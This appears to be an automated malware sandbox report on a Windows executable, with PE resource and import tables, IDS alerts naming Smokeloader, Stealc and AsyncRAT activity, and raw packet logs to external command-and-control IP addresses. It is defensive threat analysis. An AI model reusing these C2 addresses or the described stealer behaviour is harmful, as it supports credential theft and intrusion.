Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
AFX_DIALOG_LAYOUT	0x1f0f48	0xe	data			1.5714285714285714
AFX_DIALOG_LAYOUT	0x1f0f58	0x2	data			5.0
RT_CURSOR	0x1f0f60	0x330	Device independent bitmap graphic, 48 x 96 x 1, image size 0			0.1948529411764706
RT_CURSOR	0x1f1290	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.33223684210526316
RT_CURSOR	0x1f13e8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.26439232409381663
RT_CURSOR	0x1f2290	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.3686823104693141
RT_CURSOR	0x1f2b38	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0			0.49060693641618497
RT_CURSOR	0x1f30d0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.27238805970149255
RT_CURSOR	0x1f3f78	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.375
RT_CURSOR	0x1f4820	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0			0.5057803468208093
RT_ICON	0x1e4830	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Tamil	India	0.4642857142857143
RT_ICON	0x1e4830	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Tamil	Sri Lanka	0.4642857142857143
RT_ICON	0x1e56d8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Tamil	India	0.5740072202166066
RT_ICON	0x1e56d8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Tamil	Sri Lanka	0.5740072202166066
RT_ICON	0x1e5f80	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Tamil	India	0.6376728110599078
RT_ICON	0x1e5f80	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Tamil	Sri Lanka	0.6376728110599078
RT_ICON	0x1e6648	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Tamil	India	0.6885838150289018
RT_ICON	0x1e6648	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Tamil	Sri Lanka	0.6885838150289018
RT_ICON	0x1e6bb0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Tamil	India	0.3567427385892116
RT_ICON	0x1e6bb0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Tamil	Sri Lanka	0.3567427385892116
RT_ICON	0x1e9158	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Tamil	India	0.4451219512195122
RT_ICON	0x1e9158	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Tamil	Sri Lanka	0.4451219512195122
RT_ICON	0x1ea200	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Tamil	India	0.5184426229508197
RT_ICON	0x1ea200	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Tamil	Sri Lanka	0.5184426229508197
RT_ICON	0x1eab88	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Tamil	India	0.6099290780141844
RT_ICON	0x1eab88	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Tamil	Sri Lanka	0.6099290780141844
RT_ICON	0x1eb068	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Tamil	India	0.3686034115138593
RT_ICON	0x1eb068	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Tamil	Sri Lanka	0.3686034115138593
RT_ICON	0x1ebf10	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tamil	India	0.4553249097472924
RT_ICON	0x1ebf10	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tamil	Sri Lanka	0.4553249097472924
RT_ICON	0x1ec7b8	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Tamil	India	0.4619815668202765
RT_ICON	0x1ec7b8	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Tamil	Sri Lanka	0.4619815668202765
RT_ICON	0x1ece80	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Tamil	India	0.45303468208092484
RT_ICON	0x1ece80	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Tamil	Sri Lanka	0.45303468208092484
RT_ICON	0x1ed3e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	India	0.2674273858921162
RT_ICON	0x1ed3e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	Sri Lanka	0.2674273858921162
RT_ICON	0x1ef990	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tamil	India	0.3072232645403377
RT_ICON	0x1ef990	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tamil	Sri Lanka	0.3072232645403377
RT_ICON	0x1f0a38	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	India	0.3537234042553192
RT_ICON	0x1f0a38	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	Sri Lanka	0.3537234042553192
RT_DIALOG	0x1f5020	0x58	data			0.8977272727272727
RT_STRING	0x1f5078	0x3b8	AmigaOS bitmap font "o", fc_YSize 26880, 22528 elements, 2nd "a", 3rd "v"	Tamil	India	0.4653361344537815
RT_STRING	0x1f5078	0x3b8	AmigaOS bitmap font "o", fc_YSize 26880, 22528 elements, 2nd "a", 3rd "v"	Tamil	Sri Lanka	0.4653361344537815
RT_STRING	0x1f5430	0x536	data	Tamil	India	0.444527736131934
RT_STRING	0x1f5430	0x536	data	Tamil	Sri Lanka	0.444527736131934
RT_STRING	0x1f5968	0x1f4	data	Tamil	India	0.518
RT_STRING	0x1f5968	0x1f4	data	Tamil	Sri Lanka	0.518
RT_STRING	0x1f5b60	0x508	data	Tamil	India	0.4409937888198758
RT_STRING	0x1f5b60	0x508	data	Tamil	Sri Lanka	0.4409937888198758
RT_STRING	0x1f6068	0x264	data	Tamil	India	0.49019607843137253
RT_STRING	0x1f6068	0x264	data	Tamil	Sri Lanka	0.49019607843137253
RT_ACCELERATOR	0x1f0f08	0x40	data	Tamil	India	0.875
RT_ACCELERATOR	0x1f0f08	0x40	data	Tamil	Sri Lanka	0.875
RT_GROUP_CURSOR	0x1f13c0	0x22	data			1.0294117647058822
RT_GROUP_CURSOR	0x1f30a0	0x30	data			0.9375
RT_GROUP_CURSOR	0x1f4d88	0x30	data			0.9375
RT_GROUP_ICON	0x1eaff0	0x76	data	Tamil	India	0.6610169491525424
RT_GROUP_ICON	0x1eaff0	0x76	data	Tamil	Sri Lanka	0.6610169491525424
RT_GROUP_ICON	0x1f0ea0	0x68	data	Tamil	India	0.7115384615384616
RT_GROUP_ICON	0x1f0ea0	0x68	data	Tamil	Sri Lanka	0.7115384615384616
RT_VERSION	0x1f4db8	0x268	MS Windows COFF Motorola 68000 object file			0.5454545454545454

Imports

DLL	Import
KERNEL32.dll	CreateJobObjectW, InterlockedCompareExchange, UnlockFile, CreateHardLinkA, GetTickCount, CreateNamedPipeW, GetNumberFormatA, GetConsoleAliasExesW, SetCommState, GlobalAlloc, LoadLibraryW, LocalShrink, GetCalendarInfoA, SetVolumeMountPointA, GetSystemWindowsDirectoryA, GetConsoleAliasExesLengthW, SetConsoleCP, GetFileAttributesW, GetModuleFileNameW, CreateActCtxA, GetThreadPriorityBoost, VerifyVersionInfoW, GetLogicalDriveStringsA, GetCurrentDirectoryW, SetLastError, GetProcAddress, GetConsoleDisplayMode, GetProcessVersion, SetEnvironmentVariableW, InterlockedExchangeAdd, CreateFileMappingW, GetNumberFormatW, CreateEventW, OpenEventA, QueryDosDeviceW, GlobalWire, EnumDateFormatsA, EnumResourceNamesA, VirtualProtect, WaitForDebugEvent, PeekConsoleInputA, GetShortPathNameW, SetProcessShutdownParameters, SetFileShortNameA, GetDiskFreeSpaceExA, ReadConsoleInputW, GetTempPathA, EnumCalendarInfoExA, LCMapStringW, CommConfigDialogW, HeapReAlloc, RtlUnwind, HeapSize, RaiseException, SetDefaultCommConfigW, GetCurrentProcess, SetEndOfFile, GetLocaleInfoA, MultiByteToWideChar, GetLastError, HeapFree, HeapAlloc, GetModuleHandleW, ExitProcess, DecodePointer, GetCommandLineW, HeapSetInformation, GetStartupInfoW, GetCPInfo, InterlockedIncrement, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetCurrentThreadId, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, IsProcessorFeaturePresent, HeapCreate, WriteFile, GetStdHandle, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, WideCharToMultiByte, GetStringTypeW, Sleep
USER32.dll	LoadMenuW, CharUpperW, GetSysColor, GetMenuStringA, GetCaretPos, DrawStateA
GDI32.dll	GetCharWidthFloatA, CreateDCW, GetCharWidth32A, GetBitmapBits

Possible Origin

Language of compilation system	Country where language is spoken	Map
Tamil	India
Tamil	Sri Lanka

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-09-01T18:28:24.310806+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	56177	80	192.168.2.4	91.202.233.158
2024-09-01T18:28:03.102175+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	56172	80	192.168.2.4	191.191.224.16
2024-09-01T18:28:22.017920+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	56177	80	192.168.2.4	91.202.233.158
2024-09-01T18:28:07.729876+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	56175	80	192.168.2.4	191.191.224.16
2024-09-01T18:28:07.729876+0200	TCP	2851815	ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18	1	56175	80	192.168.2.4	191.191.224.16
2024-09-01T18:28:12.185731+0200	TCP	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	80	56177	91.202.233.158	192.168.2.4
2024-09-01T18:27:39.923038+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	56155	80	192.168.2.4	191.191.224.16
2024-09-01T18:27:53.916895+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	56166	80	192.168.2.4	191.191.224.16
2024-09-01T18:30:30.577828+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	56189	80	192.168.2.4	92.36.226.66
2024-09-01T18:30:25.041054+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	56188	80	192.168.2.4	92.36.226.66
2024-09-01T18:30:48.876870+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	56192	80	192.168.2.4	92.36.226.66
2024-09-01T18:27:37.409195+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	56153	80	192.168.2.4	191.191.224.16
2024-09-01T18:30:55.293384+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	56193	80	192.168.2.4	92.36.226.66
2024-09-01T18:27:48.594093+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	56161	80	192.168.2.4	191.191.224.16
2024-09-01T18:27:55.377152+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	56167	80	192.168.2.4	191.191.224.16
2024-09-01T18:27:55.377152+0200	TCP	2851815	ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18	1	56167	80	192.168.2.4	191.191.224.16
2024-09-01T18:29:25.592712+0200	TCP	2035595	ET MALWARE Generic AsyncRAT Style SSL Cert	1	56001	56180	45.202.35.38	192.168.2.4
2024-09-01T18:30:18.223191+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	56187	80	192.168.2.4	92.36.226.66
2024-09-01T18:30:18.223191+0200	TCP	2851815	ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18	1	56187	80	192.168.2.4	92.36.226.66
2024-09-01T18:30:11.872786+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	56186	80	192.168.2.4	92.36.226.66
2024-09-01T18:30:11.872786+0200	TCP	2851815	ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18	1	56186	80	192.168.2.4	92.36.226.66
2024-09-01T18:30:43.499336+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	56191	80	192.168.2.4	92.36.226.66
2024-09-01T18:30:43.499336+0200	TCP	2851815	ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18	1	56191	80	192.168.2.4	92.36.226.66
2024-09-01T18:27:30.490429+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	56148	80	192.168.2.4	191.191.224.16
2024-09-01T18:27:29.220719+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	56147	80	192.168.2.4	191.191.224.16
2024-09-01T18:27:29.220719+0200	TCP	2851815	ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18	1	56147	80	192.168.2.4	191.191.224.16
2024-09-01T18:28:09.063507+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	56176	80	192.168.2.4	191.191.224.16
2024-09-01T18:27:26.372267+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	56145	80	192.168.2.4	191.191.224.16
2024-09-01T18:27:26.372267+0200	TCP	2851815	ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18	1	56145	80	192.168.2.4	191.191.224.16
2024-09-01T18:28:24.807233+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	56177	80	192.168.2.4	91.202.233.158
2024-09-01T18:27:24.858836+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	56144	80	192.168.2.4	191.191.224.16
2024-09-01T18:27:24.858836+0200	TCP	2851815	ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18	1	56144	80	192.168.2.4	191.191.224.16
2024-09-01T18:30:36.396183+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	56190	80	192.168.2.4	92.36.226.66
2024-09-01T18:30:36.396183+0200	TCP	2851815	ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18	1	56190	80	192.168.2.4	92.36.226.66
2024-09-01T18:28:05.693162+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	56174	80	192.168.2.4	191.191.224.16
2024-09-01T18:27:22.307582+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	56142	80	192.168.2.4	191.191.224.16
2024-09-01T18:28:21.409420+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	56177	80	192.168.2.4	91.202.233.158
2024-09-01T18:27:27.965547+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	56146	80	192.168.2.4	191.191.224.16
2024-09-01T18:27:27.965547+0200	TCP	2851815	ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18	1	56146	80	192.168.2.4	191.191.224.16
2024-09-01T18:27:36.057038+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	56152	80	192.168.2.4	191.191.224.16
2024-09-01T18:27:36.057038+0200	TCP	2851815	ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18	1	56152	80	192.168.2.4	191.191.224.16
2024-09-01T18:27:43.796524+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	56158	80	192.168.2.4	191.191.224.16
2024-09-01T18:27:43.796524+0200	TCP	2851815	ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18	1	56158	80	192.168.2.4	191.191.224.16
2024-09-01T18:29:57.566254+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	56184	80	192.168.2.4	92.36.226.66
2024-09-01T18:29:57.566254+0200	TCP	2851815	ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18	1	56184	80	192.168.2.4	92.36.226.66
2024-09-01T18:27:31.874870+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	56149	80	192.168.2.4	191.191.224.16
2024-09-01T18:27:57.953912+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	56170	80	192.168.2.4	191.191.224.16
2024-09-01T18:28:11.581616+0200	TCP	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	56177	80	192.168.2.4	91.202.233.158
2024-09-01T18:29:19.120665+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	56178	80	192.168.2.4	191.191.224.16
2024-09-01T18:28:13.644145+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	56177	80	192.168.2.4	91.202.233.158
2024-09-01T18:28:20.207780+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	56177	80	192.168.2.4	91.202.233.158
2024-09-01T18:30:05.185420+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	56185	80	192.168.2.4	92.36.226.66
2024-09-01T18:27:52.655324+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	56165	80	192.168.2.4	191.191.224.16
2024-09-01T18:29:47.286090+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	56183	80	192.168.2.4	191.191.224.16
2024-09-01T18:27:50.133325+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	56162	80	192.168.2.4	191.191.224.16
2024-09-01T18:28:04.415568+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	56173	80	192.168.2.4	191.191.224.16
2024-09-01T18:27:34.494902+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	56151	80	192.168.2.4	191.191.224.16
2024-09-01T18:27:34.494902+0200	TCP	2851815	ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18	1	56151	80	192.168.2.4	191.191.224.16
2024-09-01T18:27:56.670804+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	56168	80	192.168.2.4	191.191.224.16
2024-09-01T18:28:12.056479+0200	TCP	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	56177	80	192.168.2.4	91.202.233.158
2024-09-01T18:27:33.232836+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	56150	80	192.168.2.4	191.191.224.16
2024-09-01T18:29:26.363148+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	56179	80	192.168.2.4	191.191.224.16
2024-09-01T18:29:26.363148+0200	TCP	2851815	ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18	1	56179	80	192.168.2.4	191.191.224.16
2024-09-01T18:29:33.679221+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	56181	80	192.168.2.4	191.191.224.16
2024-09-01T18:29:33.679221+0200	TCP	2851815	ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18	1	56181	80	192.168.2.4	191.191.224.16
2024-09-01T18:27:45.059197+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	56159	80	192.168.2.4	191.191.224.16
2024-09-01T18:27:45.059197+0200	TCP	2851815	ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18	1	56159	80	192.168.2.4	191.191.224.16
2024-09-01T18:28:19.097014+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	56177	80	192.168.2.4	91.202.233.158
2024-09-01T18:28:11.832589+0200	TCP	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	80	56177	91.202.233.158	192.168.2.4
2024-09-01T18:29:40.841730+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	56182	80	192.168.2.4	191.191.224.16
2024-09-01T18:28:11.818662+0200	TCP	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	56177	80	192.168.2.4	91.202.233.158
2024-09-01T18:28:13.139572+0200	TCP	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	56177	80	192.168.2.4	91.202.233.158
2024-09-01T18:27:41.274011+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	56156	80	192.168.2.4	191.191.224.16
2024-09-01T18:27:58.652505+0200	TCP	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	2	56171	443	192.168.2.4	84.32.84.144
2024-09-01T18:27:38.658236+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	56154	80	192.168.2.4	191.191.224.16
2024-09-01T18:27:51.385279+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	56164	80	192.168.2.4	191.191.224.16
2024-09-01T18:27:42.526719+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	56157	80	192.168.2.4	191.191.224.16
2024-09-01T18:27:23.581272+0200	TCP	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	56143	80	192.168.2.4	191.191.224.16
2024-09-01T18:28:27.560020+0200	TCP	2044249	ET MALWARE Win32/Stealc Submitting Screenshot to C2	1	56177	80	192.168.2.4	91.202.233.158

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 1, 2024 18:27:21.044764042 CEST	56142	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:21.050726891 CEST	80	56142	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:21.050789118 CEST	56142	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:21.050909996 CEST	56142	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:21.050935984 CEST	56142	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:21.056869984 CEST	80	56142	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:21.057163000 CEST	80	56142	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:22.306963921 CEST	80	56142	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:22.307527065 CEST	80	56142	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:22.307581902 CEST	56142	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:22.308374882 CEST	56142	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:22.311513901 CEST	56143	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:22.313051939 CEST	80	56142	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:22.316325903 CEST	80	56143	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:22.316389084 CEST	56143	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:22.316498041 CEST	56143	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:22.316523075 CEST	56143	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:22.321266890 CEST	80	56143	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:22.321325064 CEST	80	56143	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:23.580741882 CEST	80	56143	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:23.581211090 CEST	80	56143	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:23.581271887 CEST	56143	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:23.581305981 CEST	56143	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:23.583796024 CEST	56144	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:23.586189985 CEST	80	56143	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:23.588689089 CEST	80	56144	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:23.588753939 CEST	56144	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:23.588857889 CEST	56144	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:23.588879108 CEST	56144	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:23.593728065 CEST	80	56144	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:23.593924046 CEST	80	56144	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:24.857227087 CEST	80	56144	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:24.858769894 CEST	80	56144	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:24.858835936 CEST	56144	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:24.858875036 CEST	56144	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:24.861707926 CEST	56145	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:24.863667965 CEST	80	56144	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:24.866544008 CEST	80	56145	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:24.866614103 CEST	56145	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:24.866756916 CEST	56145	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:24.866787910 CEST	56145	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:24.872611046 CEST	80	56145	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:24.873634100 CEST	80	56145	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:26.372167110 CEST	80	56145	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:26.372184992 CEST	80	56145	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:26.372200012 CEST	80	56145	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:26.372267008 CEST	56145	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:26.372381926 CEST	56145	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:26.372409105 CEST	80	56145	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:26.372447014 CEST	56145	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:26.374771118 CEST	56146	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:26.377167940 CEST	80	56145	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:26.379548073 CEST	80	56146	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:26.380019903 CEST	56146	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:26.380178928 CEST	56146	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:26.380196095 CEST	56146	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:26.384896994 CEST	80	56146	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:26.385109901 CEST	80	56146	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:27.965471029 CEST	80	56146	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:27.965492964 CEST	80	56146	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:27.965501070 CEST	80	56146	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:27.965547085 CEST	56146	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:27.965578079 CEST	56146	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:27.965723038 CEST	56146	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:27.965965033 CEST	80	56146	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:27.966008902 CEST	56146	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:27.968169928 CEST	56147	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:27.970429897 CEST	80	56146	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:27.972942114 CEST	80	56147	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:27.973017931 CEST	56147	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:27.973150969 CEST	56147	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:27.973164082 CEST	56147	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:27.977857113 CEST	80	56147	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:27.978043079 CEST	80	56147	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:29.220155001 CEST	80	56147	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:29.220643044 CEST	80	56147	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:29.220719099 CEST	56147	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:29.220752001 CEST	56147	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:29.223172903 CEST	56148	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:29.225528955 CEST	80	56147	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:29.227977037 CEST	80	56148	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:29.228061914 CEST	56148	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:29.228163958 CEST	56148	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:29.228178978 CEST	56148	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:29.232863903 CEST	80	56148	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:29.233015060 CEST	80	56148	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:30.489590883 CEST	80	56148	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:30.490372896 CEST	80	56148	191.191.224.16	192.168.2.4
Sep 1, 2024 18:27:30.490428925 CEST	56148	80	192.168.2.4	191.191.224.16
Sep 1, 2024 18:27:30.490478039 CEST	56148	80	192.168.2.4	191.191.224.16
